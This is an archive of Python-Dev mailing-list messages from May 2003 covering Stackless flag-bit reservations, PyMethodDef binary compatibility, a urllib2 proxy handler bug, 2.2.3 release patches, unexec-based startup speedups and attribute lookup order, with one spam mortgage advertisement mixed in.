From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 19 May 2003 22:10:45 +0200
Subject: [Python-Dev] Need advice, maybe support
In-Reply-To: <3EC91EA0.5090105@tismer.com>
References: <3EC579B4.9000303@tismer.com>
 <200305182104.h4IL4eY17830@pcp02138704pcs.reston01.va.comcast.net>
 <3EC91EA0.5090105@tismer.com>
Message-ID: <m3ptmehf3u.fsf@mira.informatik.hu-berlin.de>

Christian Tismer <tismer@tismer.com> writes:

> The problem is that I need to give extra semantics to existing
> objects, which are PyCFunction objects.  I think putting an extra
> bit into the type object doesn't help, unless I use a new type. But
> then I don't need the flag.  An old extension module which is loaded
> into my Python will always use my PyCFunction, since this is always
> borrowed.

I understand the concern is not about changing PyCFunction, but about
changing PyMethodDef, which would get another field.

I think you can avoid adding a field to PyMethodDef, by providing a
PyMethodDefEx structure, which has the extra field, and is referred-to
from (a new slot in) the type object. The slots in the type object
that refer to PyMethodDefs would either get set to NULL, or
initialized with a copy of the PyMethodDefEx with the extra field
removed.

Regards,
Martin


From guido@python.org  Mon May 19 21:33:32 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 19 May 2003 16:33:32 -0400
Subject: [Python-Dev] a strange case
In-Reply-To: "Your message of Mon, 19 May 2003 00:19:18 +0200."
 <3EC806E6.3040204@livinglogic.de>
References: <20030516202402.30333.72761.Mailman@mail.python.org>
 <200305161345.25415.troy@gci.net>
 <200305182042.h4IKgYA17778@pcp02138704pcs.reston01.va.comcast.net>
 <3EC806E6.3040204@livinglogic.de>
Message-ID: <200305192033.h4JKXWe19538@pcp02138704pcs.reston01.va.comcast.net>

> But reload() won't work for these pseudo modules (See
> http://www.python.org/sf/701743).

Reload() is a hack that doesn't really work except in the most simple
cases.  This isn't one of those.

> What about the imp module?

Yes, what about it?  (I don't understand the remark.)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Mon May 19 21:47:39 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 19 May 2003 16:47:39 -0400
Subject: [Python-Dev] Need advice, maybe support
In-Reply-To: "Your message of Mon, 19 May 2003 20:12:48 +0200."
 <3EC91EA0.5090105@tismer.com>
References: <3EC579B4.9000303@tismer.com>
 <200305182104.h4IL4eY17830@pcp02138704pcs.reston01.va.comcast.net>
 <3EC91EA0.5090105@tismer.com>
Message-ID: <200305192047.h4JKldW19641@pcp02138704pcs.reston01.va.comcast.net>

> Guido van Rossum wrote:
> 
> [me, about how to add _nr cfunction versions in a compatible way]
> 
> > I don't think we can just add an extra field to PyMethodDef, because
> > it would break binary incompatibility.  Currently, in most cases, a
> > 3r party extension module compiled for an earlier Python version can
> > still be used with a later version.  Because PyMethodDef is used as an
> > array, adding a field to it would break this.
> 
> Bad news. I hoped you would break binary compatibility between
> major versions (like from 2.2 to 2.3), but well, now I also
> understand why there are so many flags in typeobjects :-)
> 
> > I have less of a problem with extending PyTypeObject, it grows all the
> > time and the tp_flags bits tell you how large the one you've got is.
> > (I still have some problems with this, because things that are of no
> > use to the regular Python core developers tend to either confuse them,
> > or be broken on a regular basis.)
> 
> For the typeobjects, I'm simply asking for reservation
> of a bit number. What I used is
> 
> #ifdef STACKLESS
> #define Py_TPFLAGS_HAVE_CALL_NR (1L<<15)
> #else
> #define Py_TPFLAGS_HAVE_CALL_NR 0
> #endif
> 
> but I think nobody needs to know about this, and maybe
> it is better (requiring no change of Python) if I used
> a bit from the higer end (31) or such?
> 
> > Maybe you could get away with defining an alternative structure for
> > PyMethodDef and having a flag in tp_flags say which it is; there are
> > plenty of unused bits and I don't mind reserving one for you.  Then
> > you'd have to change all the code that *uses* tp_methods, but there
> > isn't much of that; in fact, the only place I see is in typeobject.c.
> 
> The problem is that I need to give extra semantics to
> existing objects, which are PyCFunction objects.
> I think putting an extra bit into the type object
> doesn't help, unless I use a new type. But then I don't
> need the flag.
> An old extension module which is loaded into my Python
> will always use my PyCFunction, since this is always
> borrowed.
> 
> > If this doesn't work for you, maybe you could somehow fold the two
> > implementation functions into one, and put something special in the
> > argument list to signal that the non-recursive version is wanted?
> > (Thinking aloud here -- I don't know exactly what the usage pattern of
> > the nr versions will be.)
> 
> This is hard to do. I'm adding _nr versions to existing
> functions, and I don't want to break their parameter lists.
> 
> 
> Ok, what I did is rather efficient, quite a bit ugly of
> course, but binary compatible as much as possible.
> It required to steal some bits of ml_flags as a small
> integer, which are interpreted as "distance to my sibling".
> I'm extending the MethodDef arrays in a special way
> by just adding some extra records without name fields
> at the end of the array, which hold the _nr pointers.
> 
> An initialization functions initializes the small integer
> in ml_flags with the distance to this "sibling", and
> the nice thing about this is that it will never fail
> if not initialized:
> A distance of zero gives just the same record.
> 
> So what I'm asking for in this case is a small number
> of bits of the ml_flags word which will not be used,
> otherwise.
> 
> Do you think the number of bits in ml_flags might ever
> grow beyond 16, or should I just assume that I can
> safely abuse them?
> 
> thanks a lot -- chris

It's better to reserve bits explicitly.  Can you submit a patch to SF
that makes reservations of the bits you need?  All they need is a
definition of a symbol and a comment explaining what it is for;
"reserved for Stackless" is fine.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From z23byn95@earthlink.com  Tue May 20 07:05:22 2003
From: z23byn95@earthlink.com (Gino Wilcox)
Date: Tue, 20 May 03 06:05:22 GMT
Subject: [Python-Dev] Rates? xb lxomwmk cyo
Message-ID: <lgp$9032-55a8i-c2g--wq0--nr@wc1.9z.6xxmbt>

This is a multi-part message in MIME format.

--A1ADFE371.
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

Interest Rates are at their lowest point in 40 years!

We help you find the best rate for your situation by
matching your needs with hundreds of lenders!

Home Improvement, Refinance, Second Mortgage,
Home Equity Loans, and More! Even with less than
perfect credit!

This service is 100% FREE to home owners and new
home buyers without any obligation. 

Just fill out a quick, simple form and jump-start
your future plans today!


http://www.wuyi-shop.com/3/index.asp?RefID=3D383102 














To unsubscribe, please visit:

http://gethelpu.com/Auto/index.htm



ebgq  ahbiegvgqyjzzyvdcnuayts e t 
fzxpo
wulx g f
zkvv qm
puhtjg qd
uqw ns
od exxtgkxtzutlrhjvc
--A1ADFE371.--



From doko@cs.tu-berlin.de  Mon May 19 22:13:05 2003
From: doko@cs.tu-berlin.de (Matthias Klose)
Date: Mon, 19 May 2003 23:13:05 +0200
Subject: [Python-Dev] Vacation; Python 2.2.3 release.
In-Reply-To: <1053050696.26479.35.camel@geddy>
References: <200305160032.h4G0WJx17890@pcp02138704pcs.reston01.va.comcast.net>
 <1053050696.26479.35.camel@geddy>
Message-ID: <16073.18657.581177.570701@gargle.gargle.HOWL>

Barry Warsaw writes:
> FWIW, I'm going to be around, and am fairly free during the US Memorial
> Day weekend 24th - 26th.  Can we shoot for getting a release out that
> weekend?  If we can code freeze by the 22nd, I can throw together a
> release candidate on Friday (with Tim's help for Windows) and a final by
> Monday.

I'd like to see the following patches included, they are in HEAD and
currently applied in the python2.2 Debian packages, so they got some
testing.

- Send anonymous password when using anonftp
  Lib/ftplib.py 1.62 1.63
  See http://python.org/sf/497420

- robotparser.py fails on some URLs (including change of copyright
  from "Python 2.0 open source license").
  See http://python.org/sf/499513

- make tkinter compatible with tk-8.4.2.
  See http://python.org/sf/707701

	Matthias


From tismer@tismer.com  Mon May 19 22:20:18 2003
From: tismer@tismer.com (Christian Tismer)
Date: Mon, 19 May 2003 23:20:18 +0200
Subject: [Python-Dev] Need advice, maybe support
In-Reply-To: <200305192047.h4JKldW19641@pcp02138704pcs.reston01.va.comcast.net>
References: <3EC579B4.9000303@tismer.com> <200305182104.h4IL4eY17830@pcp02138704pcs.reston01.va.comcast.net> <3EC91EA0.5090105@tismer.com> <200305192047.h4JKldW19641@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3EC94A92.2040604@tismer.com>

Guido van Rossum wrote:

...

>>Do you think the number of bits in ml_flags might ever
>>grow beyond 16, or should I just assume that I can
>>safely abuse them?
>>
>>thanks a lot -- chris
> 
> 
> It's better to reserve bits explicitly.  Can you submit a patch to SF
> that makes reservations of the bits you need?  All they need is a
> definition of a symbol and a comment explaining what it is for;
> "reserved for Stackless" is fine.

Ok, what I'm asking for is:
"please reserve one bit for me in tp->flags" (31 preferred) and
"please reserve 8 bits for me in ml->flags" (24-31 preferred).
The latter will also not degrade performance, since
these bits shalt simply not be used, but if STACKLESS isn't
defined, there is no need to mask these bits off.
I also will name these fields in a way that makes it obvious
for everybody that they better should not touch these.

Iff you agree, I'm going to submit my patch now, and my thanks
will follow you for the rest of the subset of our lives. :)

sincerely -- chris

-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/




From cnetzer@mail.arc.nasa.gov  Mon May 19 22:25:57 2003
From: cnetzer@mail.arc.nasa.gov (Chad Netzer)
Date: 19 May 2003 14:25:57 -0700
Subject: [Python-Dev] Vacation; Python 2.2.3 release.
In-Reply-To: <16073.18657.581177.570701@gargle.gargle.HOWL>
References: <200305160032.h4G0WJx17890@pcp02138704pcs.reston01.va.comcast.net>
 <1053050696.26479.35.camel@geddy>
 <16073.18657.581177.570701@gargle.gargle.HOWL>
Message-ID: <1053379556.533.74.camel@sayge.arc.nasa.gov>

On Mon, 2003-05-19 at 14:13, Matthias Klose wrote:

> I'd like to see the following patches included, they are in HEAD and
> currently applied in the python2.2 Debian packages, so they got some
> testing.

> - make tkinter compatible with tk-8.4.2.
>   See http://python.org/sf/707701

Don't know about the others, but this one at least seems to have been
applied.

Chad




From niemeyer@conectiva.com  Mon May 19 22:28:08 2003
From: niemeyer@conectiva.com (Gustavo Niemeyer)
Date: Mon, 19 May 2003 18:28:08 -0300
Subject: [Python-Dev] urllib2 proxy support broken?
Message-ID: <20030519212807.GA29002@ibook.distro.conectiva>

I've just tried to use the proxy support in urllib2, and was surprised
by the fact that it seems to be broken, at least in 2.2 and 2.3. Can
somebody please confirm that it's really broken, so that I can prepare
a patch?

If I understood it correctly, that's how the proxy support is supposed
to work:

    import urllib2
    proxy_support = urllib2.ProxyHandler({"http":"http://ahad-haam:3128"})
    opener = urllib2.build_opener(proxy_support)
    urllib2.install_opener(opener)
    f = urllib2.urlopen('http://www.python.org/')

OTOH, code in build_opener() does this:

    # Remove default handler if a custom handler was provided
    for klass in default_classes:
        for check in handlers:
            if inspect.isclass(check):
                if issubclass(check, klass):
                    skip.append(klass)
            elif isinstance(check, klass):
                skip.append(klass)
    for klass in skip:
        default_classes.remove(klass)

    # Instantiate default handler and append them
    for klass in default_classes:
        opener.add_handler(klass())

    # Instantiate custom handler and append them
    for h in handlers:
        if inspect.isclass(h):
            h = h() 
        opener.add_handler(h)


Notice that default handlers are added *before* custom handlers, so
HTTPHandler.http_open() ends up being called before
ProxyHandler.http_open(), and the later doesn't work.

To make the first snippet work, one would have to use the unobvious
version:

    import urllib2
    proxy_support = urllib2.ProxyHandler({"http":"http://ahad-haam:3128"})
    http_support = urllib2.HTTPHandler()
    opener = urllib2.build_opener(proxy_support, http_support)
    urllib2.install_opener(opener)
    f = urllib2.urlopen('http://www.python.org/')

Is this really broken, or perhaps it's a known "feature" which should be
left as is to avoid side effects (and I should patch the documentation
instead)?

-- 
Gustavo Niemeyer

[ 2AAC 7928 0FBF 0299 5EB5  60E2 2253 B29A 6664 3A0C ]


From guido@python.org  Mon May 19 22:36:24 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 19 May 2003 17:36:24 -0400
Subject: [Python-Dev] Need advice, maybe support
In-Reply-To: "Your message of Mon, 19 May 2003 23:20:18 +0200."
 <3EC94A92.2040604@tismer.com>
References: <3EC579B4.9000303@tismer.com>
 <200305182104.h4IL4eY17830@pcp02138704pcs.reston01.va.comcast.net>
 <3EC91EA0.5090105@tismer.com>
 <200305192047.h4JKldW19641@pcp02138704pcs.reston01.va.comcast.net>
 <3EC94A92.2040604@tismer.com>
Message-ID: <200305192136.h4JLaOX20032@pcp02138704pcs.reston01.va.comcast.net>

> > It's better to reserve bits explicitly.  Can you submit a patch to SF
> > that makes reservations of the bits you need?  All they need is a
> > definition of a symbol and a comment explaining what it is for;
> > "reserved for Stackless" is fine.
> 
> Ok, what I'm asking for is:
> "please reserve one bit for me in tp->flags" (31 preferred) and
> "please reserve 8 bits for me in ml->flags" (24-31 preferred).
> The latter will also not degrade performance, since
> these bits shalt simply not be used, but if STACKLESS isn't
> defined, there is no need to mask these bits off.
> I also will name these fields in a way that makes it obvious
> for everybody that they better should not touch these.
> 
> Iff you agree, I'm going to submit my patch now, and my thanks
> will follow you for the rest of the subset of our lives. :)

+1

--Guido van Rossum (home page: http://www.python.org/~guido/)


From doko@cs.tu-berlin.de  Mon May 19 22:31:47 2003
From: doko@cs.tu-berlin.de (Matthias Klose)
Date: Mon, 19 May 2003 23:31:47 +0200
Subject: [Python-Dev] Vacation; Python 2.2.3 release.
In-Reply-To: <16073.18657.581177.570701@gargle.gargle.HOWL>
References: <200305160032.h4G0WJx17890@pcp02138704pcs.reston01.va.comcast.net>
 <1053050696.26479.35.camel@geddy>
 <16073.18657.581177.570701@gargle.gargle.HOWL>
Message-ID: <16073.19779.115820.624940@gargle.gargle.HOWL>

Matthias Klose writes:
> Barry Warsaw writes:
> > FWIW, I'm going to be around, and am fairly free during the US Memorial
> > Day weekend 24th - 26th.  Can we shoot for getting a release out that
> > weekend?  If we can code freeze by the 22nd, I can throw together a
> > release candidate on Friday (with Tim's help for Windows) and a final by
> > Monday.
> 
> I'd like to see the following patches included, they are in HEAD and
> currently applied in the python2.2 Debian packages, so they got some
> testing.

> - make tkinter compatible with tk-8.4.2.
>   See http://python.org/sf/707701

oops, sorry this one is already applied.


From tismer@tismer.com  Mon May 19 23:09:14 2003
From: tismer@tismer.com (Christian Tismer)
Date: Tue, 20 May 2003 00:09:14 +0200
Subject: [Python-Dev] Need advice, maybe support
In-Reply-To: <m3ptmehf3u.fsf@mira.informatik.hu-berlin.de>
References: <3EC579B4.9000303@tismer.com>	<200305182104.h4IL4eY17830@pcp02138704pcs.reston01.va.comcast.net>	<3EC91EA0.5090105@tismer.com> <m3ptmehf3u.fsf@mira.informatik.hu-berlin.de>
Message-ID: <3EC9560A.9070602@tismer.com>

Lieber Martin,

> Christian Tismer <tismer@tismer.com> writes:
> 
> 
>>The problem is that I need to give extra semantics to existing
>>objects, which are PyCFunction objects.  I think putting an extra
>>bit into the type object doesn't help, unless I use a new type. But
>>then I don't need the flag.  An old extension module which is loaded
>>into my Python will always use my PyCFunction, since this is always
>>borrowed.
> 
> 
> I understand the concern is not about changing PyCFunction, but about
> changing PyMethodDef, which would get another field.

Exactly. This is the static structure which is lingering around in
many old extension modules, and to change it would require massive
recompilation.

> I think you can avoid adding a field to PyMethodDef, by providing a
> PyMethodDefEx structure, which has the extra field, and is referred-to
> from (a new slot in) the type object. The slots in the type object
> that refer to PyMethodDefs would either get set to NULL, or
> initialized with a copy of the PyMethodDefEx with the extra field
> removed.

Hey, that's really not bad!

Today, I've banged my head on my desk many times, trying to
find out how to turn a clean, new approach into the least
hackish surrogate, which is binary compatible.
Well, I found some, not really pretty but working.
It uses not an extra field, but extra records, which are
used as sibling fields, past the end of the method table.

I have to think about what implementation is more efficient,
and uses less of my resources. Since Guido donated 8+1 bits
to me, I have a big degree of freedom about how I will
implement things in the future.

Maybe I'd go ahead and see these bits checked in ASAP, and then
re-think the design. Perhaps I will give back 8 bits, when I really
don't need them, but I really don't know, yet.

thanks anyway -- good idea - chris

-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/




From martin@v.loewis.de  Mon May 19 23:33:25 2003
From: martin@v.loewis.de (=?ISO-8859-1?Q?=22Martin_v=2E_L=F6wis=22?=)
Date: Tue, 20 May 2003 00:33:25 +0200
Subject: [Python-Dev] Vacation; Python 2.2.3 release.
In-Reply-To: <16073.18657.581177.570701@gargle.gargle.HOWL>
References: <200305160032.h4G0WJx17890@pcp02138704pcs.reston01.va.comcast.net>	<1053050696.26479.35.camel@geddy> <16073.18657.581177.570701@gargle.gargle.HOWL>
Message-ID: <3EC95BB5.7000706@v.loewis.de>

Matthias Klose wrote:
 > - make tkinter compatible with tk-8.4.2.
 >   See http://python.org/sf/707701

As the comment indicates, the patch was already applied as
1.160.10.3. Is anything needed beyond that?

> - Send anonymous password when using anonftp
>   Lib/ftplib.py 1.62 1.63
>   See http://python.org/sf/497420
> 
> - robotparser.py fails on some URLs (including change of copyright
>   from "Python 2.0 open source license").
>   See http://python.org/sf/499513

I will look into those two.

Regards,
Martin



From cgw@alum.mit.edu  Mon May 19 23:55:09 2003
From: cgw@alum.mit.edu (Charles G Waldman)
Date: Mon, 19 May 2003 17:55:09 -0500
Subject: [Python-Dev] portable undumper in xemacs
In-Reply-To: <20030519160007.6607.29714.Mailman@mail.python.org>
References: <20030519160007.6607.29714.Mailman@mail.python.org>
Message-ID: <16073.24781.473766.414482@nyx.dyndns.org>

 > develop it, she simply downloaded it.  The other dumpers in xemacs
 > seem to be GPL, and I think that the "portable undump" mentioned by
 > another poster is a placeholder for a project that isn't written yet:
 > http://www.xemacs.org/Architecting-XEmacs/unexec.html)

I'm pretty sure that the "Architecting-XEmacs" page is out of date,
and the "portable undump" is a reality.  Grab current xemacs sources
and try doing "./configure --with-pdump"




From tim@zope.com  Tue May 20 00:26:24 2003
From: tim@zope.com (Tim Peters)
Date: Mon, 19 May 2003 19:26:24 -0400
Subject: [Python-Dev] Re: C new-style classes and GC
In-Reply-To: <16E1010E4581B049ABC51D4975CEDB880113DB01@UKDCX001.uk.int.atosorigin.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEHJEGAB.tim@zope.com>

[Moore, Paul, on
 http://www.python.org/dev/doc/devel/ext/defining-new-types.html
]

> Just looking at this, I note the "Note" at the top. The way
> this reads, it implies that details of how things used to work
> has been removed. I don't know if this is true, but I'd prefer
> if it wasn't.
>
> People upgrading their extensions would find the older
> information useful

I'm not sure how.  If their extensions work now, there's a very high degree
of compatibility, and they should continue to work.  If they want to make
life simpler by exploiting new API features, then they need the new docs,
and the old docs say nothing useful about that (since they were written
before the newer API gimmicks were even ideas).

> (actually, an "Upgrading from the older API" section would be even
> nicer, but that involves more work...)

Except that the old API still functions.  Even major abusers <wink> like
ExtensionClass still work under 2.3.

There's one sometimes-expressed need that isn't being met:  people who need
their extensions to run under many versions of Python.  The canonical
examples of extensions are in the Python core, and of course those only need
to run with the current Python release, so staring at them doesn't yield any
clues.  I'm not sure we (the developers) give it much thought, either (e.g.,
I know I don't -- the # of things I can worry about at once decreases as I
grow older <0.3 wink>).

Micheal Hudson made a nice start in that direction, with 2.3's

    Misc/pymemcompat.h

If you write your code to 2.3's simpler memory API, and #include that file,
it will translate 2.3's spellings (via macros) into older spellings back
through 1.5.2, keying off PY_VERSION_HEX to choose the right renamings.

Jim is doing something related by hand in these docs, via the unnecessary

    #ifndef PyMODINIT_FUNC	/* declarations for DLL import/export */
    #define PyMODINIT_FUNC void
    #endif

blocks.  That is, PyMODINIT_FUNC is defined (via Python.h) in 2.3, so the
development docs shouldn't encourage pretending it may not be.  It would be
a good idea to add suitable redefinitions of PyMODINIT_FUNC to pymemcompat.h
too, but whether someone will volunteer to do so is an open question.

> Having to refer to an older copy of the documentation (which they
> may not even have installed) could tip the balance between "lets
> keep up to date" and "if it works, don't fix it".
>
> Heck, I still have some code I wrote for the 1.4 API which still
> works.

It probably still does.

> I've never got round to upgrading it, on the basis that someone might
> be using it with 1.5 still. But when I do, I'd dump pre-2.2 support, so
> *I* have no use for "older" documentation except to find out what all
> that old code meant... :-)

What remains unclear is what good the older documentation would do anyone.
You're going to migrate or you're not.  If you don't, you don't need the new
docs; if you do, you don't need the old docs; it's those who want to support
multiple Pythons simultaneously who need to know everything, and they really
need more help than throwing all releases' docs into one giant pile.



From dberlin@dberlin.org  Tue May 20 04:04:35 2003
From: dberlin@dberlin.org (Daniel Berlin)
Date: Mon, 19 May 2003 23:04:35 -0400
Subject: Using emacs' unexec to speed Python startup (was Re: [Python-Dev] Startup time)
In-Reply-To: <20030519120633.GA12073@unpythonic.net>
Message-ID: <C915D808-8A6F-11D7-B20E-000A95A34564@dberlin.org>

On Monday, May 19, 2003, at 08:06  AM, Jeff Epler wrote:

> O Sun, May 18, 2003 at 11:28:08PM -0400, Barry Warsaw wrote:
>> Since it looks like you implemented the meat of it as a module, I
>> wonder if it couldn't be cleaned up (with the interrupt reset either
>> pulled in the extension or exposed to Python) and added to Python 2.3?
>
> First off, I sure doubt that this feature could be truly made
> "non-experimental" before 2.3 is released.  There was one "strange 
> bug" so
> far (the signal thing), though that was quickly solved (with another
> change to the core Python source code).
>
> Secondly, forcing all allocations to come from the heap instead of 
> mmap'd
> space may hurt performance.
>
> Thirdly, the files implementing unexec itself, which come from fsf 
> emacs,
> are covered by the GNU GPL, which I think makes them unsuitable for
> compiling into Python. (There's something called "dynodump" in Emacs 
> that
> appears to apply to ELF binaries which bears this license:
>  * This source code is a product of Sun Microsystems, Inc. and is 
> provided
>  * for unrestricted use provided that this legend is included on all 
> tape
>  * media and as a part of the software program in whole or part.  Users
>  * may copy or modify this source code without charge, but are not 
> authorized
>  * to license or distribute it to anyone else except as part of a 
> product or
>  * program developed by the user.
> I wish I understood what "except as part of a product or program 
> developed
> by the user" meant--does that mean that Alice can't download Python
> then give it to Bob if it includes dynodump?  After all, Alice didn't
> develop it, she simply downloaded it.  The other dumpers in xemacs
> seem to be GPL, and I think that the "portable undump" mentioned by
> another poster is a placeholder for a project that isn't written yet:
> http://www.xemacs.org/Architecting-XEmacs/unexec.html)
It was written and is on by default  since 21.2 came out, the website 
is out of date.

See http://www.xemacs.org/Releases/Public-21.2/projects/pdump.html

It's probably too xemacs specific, however.

The file you want is dumper.c.

>
> Fourthly, we'd have to duplicate whatever machinery chooses the correct
> unexec implementation for the platform you're running on---there are 
> lots to
> choose from:

Only if you do undumping the same way. The portable dumper way was to 
not make an executable, instead putting it in a seperate file, and 
storing it in a neutral format that was architected to make loading 
fast.
It's still faster than loading byte-compiled files, since nothing needs 
to be executed as we are just recreating the in-memory representation.

> 	unexaix.c     unexconvex.c  unexenix.c     unexnext.c    unexw32.c
> 	unexalpha.c   unexec.c      unexhp9k800.c  unexsni.c
> 	unexapollo.c  unexelf.c     unexmips.c     unexsunos4.c
> (Of course, it's well known that only elf and win32 matter in these 
> modern
> times)
>
> I'd be excited to see "my work" in Python, though the fact of the 
> matter
> is that I just tried this out because I was bored on a Sunday 
> afternoon.
>
> Jeff
>
> _______________________________________________
> Python-Dev mailing list
> Python-Dev@python.org
> http://mail.python.org/mailman/listinfo/python-dev



From dberlin@dberlin.org  Tue May 20 04:06:01 2003
From: dberlin@dberlin.org (Daniel Berlin)
Date: Mon, 19 May 2003 23:06:01 -0400
Subject: Using emacs' unexec to speed Python startup (was Re: [Python-Dev] Startup time)
In-Reply-To: <20030519154848.GD13673@unpythonic.net>
Message-ID: <FC677B48-8A6F-11D7-B20E-000A95A34564@dberlin.org>

On Monday, May 19, 2003, at 11:48  AM, Jeff Epler wrote:

> On Mon, May 19, 2003 at 10:39:33AM -0500, Skip Montanaro wrote:
>> I assume none of this stuff will work on Windows.
>
> there *is* a "unexnt.c" in xemacs,
Unused.
Xemacs uses the dumper.c portable dumper by default on NT nowadays.

If you were to choose an unexec, you'd thus want the one from emacs, 
since it's presumably still maintained.

>  and "unexw32.c" in emacs. 



From dsilva@ccs.neu.edu  Tue May 20 05:20:35 2003
From: dsilva@ccs.neu.edu (Daniel Silva)
Date: Tue, 20 May 2003 00:20:35 -0400 (EDT)
Subject: [Python-Dev] Python Run-Time System and Extensions
Message-ID: <Pine.GSO.4.53.0305200018560.24697@denali.ccs.neu.edu>

[Note: I first sent this to Jeremy Hylton through his MIT e-mail address,
but in case he no longer uses that one, I'm resending to python-dev and
his Zope account.]

Hello,

My name is Daniel Silva and I'm working on a Python compiler that
generates PLT Scheme code.=A0 The work is nearly done, except for large
parts of the run-time system and support for python C extensions.

Since PLT's platform is MzScheme, I need to connect the MzScheme
foreign-function interface to the C Python foreign-function interface and
vice-versa.=A0 MzScheme's FFI works with SchemeObject C data structures and
Python's FFI works with PyObject, among others.=A0 We aim for
source compatibility, not binary.=A0 To achieve this, we see two
possibilities: provide our own Python.h and typedef PyObject as another
name for SchemeObject, or marshall SchemeObject structures into PyObject
structures.

If we were to pretend that SchemeObjects are PyObjects, we could have
Scheme do most of the work, but we run into problems with C structure
field access.=A0 Through this method, we can use the existing code of the
Python runtime system that uses selectors -- which I heard you are
responsible for (thank you!) -- and replace the implementation of
selectors like PyString_Get_Size with calls to Scheme equivalents, such as
scheme_string_get_size, which would not break code that uses selectors.

This approach is problematic when we encounter C code that looks like
my_py_obj->some_field.=A0 This obviously would be incompatible, as
SchemeObjects do not have the same fields.=A0 Such a style is used in
various parts of the Python runtime system, and we would have to
re-implement all of those.=A0 That is a bit of a burden, but more worrysome
is the possibility of third-party Python C extensions using this style --
those would not work with our system.

The alternative is to marshall every SchemeObject into the PyObject data
structure described in CPython's own headers.=A0 This method would make it
possible for us to use both the Python runtime system (and automatically
keep up with changes) and third-party extensions.=A0 However, once our
objects are marshalled into PyObjects, any change made to the new target
is not seen by the original SchemeObject, so we lose mutation.=A0 Without
mutation, our interpreter is useless for virtually every Python program.

We are ready to pick an option and run with it.=A0 Do you think one of thos=
e
two holds better hope than the other, or do you see a third alternative?
I am willing to provide the remaining selectors for the CPython project,
or if they already exist, to write the necessary documentation to advocate
their use to those writing extensions.

Regards,

Daniel Silva


From BPettersen@NAREX.com  Tue May 20 07:25:26 2003
From: BPettersen@NAREX.com (Bjorn Pettersen)
Date: Tue, 20 May 2003 00:25:26 -0600
Subject: [Python-Dev] Attribute lookup (was Re: python-dev Summary  for 2003-05-01 through 2003-05-15)
Message-ID: <60FB8BB7F0EFC7409B75EEEC13E20192022DE51A@admin56.narex.com>

> From: Phillip J. Eby [mailto:pje@telecommunity.com]=20
>=20
> At 09:58 PM 5/18/03 -0400, Aahz wrote:
> > [Normally I send my corrections to Brett privately, but=20
> > since I'm taking a whack at attribute lookup, I figured=20
> > this ought to be public.]
> >
> >On Sun, May 18, 2003, Brett C. wrote:
> > >
> > > The only thing I would like help with this summary is if=20
> > > someone knows the attribute lookup order (instance,=20
> > > class, class descriptor, ...)

[...]

> >This gets real tricky.  For simple attributes of an=20
> >instance, the order is instance, class/type, and base=20
> >classes of the class/type (but *not* the metaclass). =20
> >However, method resolution of the special methods goes
> >straight to the class.  Finally, if an attribute is found on the
> >instance, a search goes through the hierarchy to see whether a set
> >descriptor overrides (note specifically that it's a set descriptor;
> >methods are implemented using get descriptors).
> >
> >I *think* I have this right, but I'm sure someone will=20
> >correct me if I'm wrong.
>=20
> Here's the algorithm in a bit more detail:
>=20
> 1. First, the class/type and its bases are searched, checking=20
> dictionaries only.
>=20
> 2. If the object found is a "data descriptor"  (i.e. has a=20
> type with a non-null tp_descr_set pointer, which is closely=20
> akin to whether the descriptor has a '__set__' attribute),=20
> then the data descriptor's __get__ method is invoked.
>=20
> 3. If the object is not found, or not a data descriptor, the=20
> instance dictionary is checked.  If the attribute isn't in the=20
> instance dictionary, then the descriptor's __get__ method is=20
> invoked (assuming a descriptor was found).
>=20
> 4. Invoke __getattr__ if present.
>=20
> (Note that replacing __getattribute__ *replaces* this entire=20
> algorithm.)
>=20
> Also note that special methods are *not* handled specially here. =20
> The behavior Aahz is referring to is that slots (e.g. tp_call) on=20
> new-style types do not retrieve an instance attribute; they are=20
> based purely on class-level data.
[...]

Wouldn't that be explicitly specified class-level data, i.e. it
circumvents the __getattr__ hook completely:

>>> class C(object):
...   def __getattr__(self, attr):
...     if attr =3D=3D '__len__':
...        return lambda:42
...
>>> c =3D C()
>>> len(c)
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
TypeError: len() of unsized object

this makes it impossible to implement a __getattr__ anywhere that
intercepts len(obj):

>>> class meta(type):
...   def __getattr__(self, attr):
...     if attr =3D=3D '__len__':
...        return lambda:42
...
>>> class C(object):
...   __metaclass__ =3D meta
...
>>> C.__len__()
42
>>> c =3D C()
>>> len(c)
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
TypeError: len() of unsized object
>>> len(C)
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
TypeError: len() of unsized object

The meta example would have to work to be able to create "true" proxy
objects(?)

Is this intended behaviour?

-- bjorn


From Paul.Moore@atosorigin.com  Tue May 20 10:19:09 2003
From: Paul.Moore@atosorigin.com (Moore, Paul)
Date: Tue, 20 May 2003 10:19:09 +0100
Subject: [Python-Dev] Re: C new-style classes and GC
Message-ID: <16E1010E4581B049ABC51D4975CEDB880113DB17@UKDCX001.uk.int.atosorigin.com>

From: Tim Peters [mailto:tim@zope.com]
> What remains unclear is what good the older documentation
> would do anyone. You're going to migrate or you're not.
> If you don't, you don't need the new docs; if you do, you
> don't need the old docs

My thought was that if & when I ever go back to this code, the
chance of me remembering what the old APIs do is pretty small.
